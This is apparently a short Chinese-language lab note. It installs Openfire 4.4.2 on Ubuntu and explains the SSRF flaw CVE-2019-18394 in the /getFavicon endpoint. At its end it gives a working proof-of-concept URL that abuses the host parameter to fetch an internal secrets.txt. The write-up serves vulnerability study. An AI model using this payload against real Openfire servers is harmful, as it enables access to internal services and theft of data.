Openfire安装
77@ubuntu129:~/repos$ wget https://github.com/igniterealtime/Openfire/releases/download/v4.4.2/openfire_4.4.2_all.deb
77@ubuntu129:~/repos$ sudo dpkg -i openfire_4.4.2_all.deb
Selecting previously unselected package openfire.
(Reading database ... 332004 files and directories currently installed.)
Preparing to unpack openfire_4.4.2_all.deb ...
Unpacking openfire (4.4.2) ...
Setting up openfire (4.4.2) ...
adduser: Warning: The home directory `/var/lib/openfire' does not belong to the user you are currently creating.
Processing triggers for ureadahead (0.100.0-21) ...
Processing triggers for systemd (237-3ubuntu10.24) ...
77@ubuntu129:~/repos$ sudo systemctl start openfire.service
77@ubuntu129:~/repos$ tcp|grep 9090
tcp6 0 0 :::9090 :::* LISTEN 28190/java
在WEB界面继续安装:
参考:
- https://www.vultr.com/docs/how-to-setup-an-openfire-xmpp-server-on-ubuntu-16-04-lts
- https://computingforgeeks.com/install-openfire-xmpp-chat-server-on-ubuntu-linux/
安装完成之后进入这个界面:
SSRF:CVE-2019-18394
/getFavicon对应了FaviconServlet这个类,
进入这个类,其doGet方法里根据用户的host参数,进行http请求。
xmppserver/src/main/java/org/jivesoftware/util/FaviconServlet.java
由于后面跟着/favicon.ico
可以用?
来讲后面的作为请求参数,而造成任意path的请求。
http://192.168.85.129:9090/getFavicon?host=192.168.85.129:4444/secrets.txt?a=
参考
- https://swarm.ptsecurity.com/openfire-admin-console/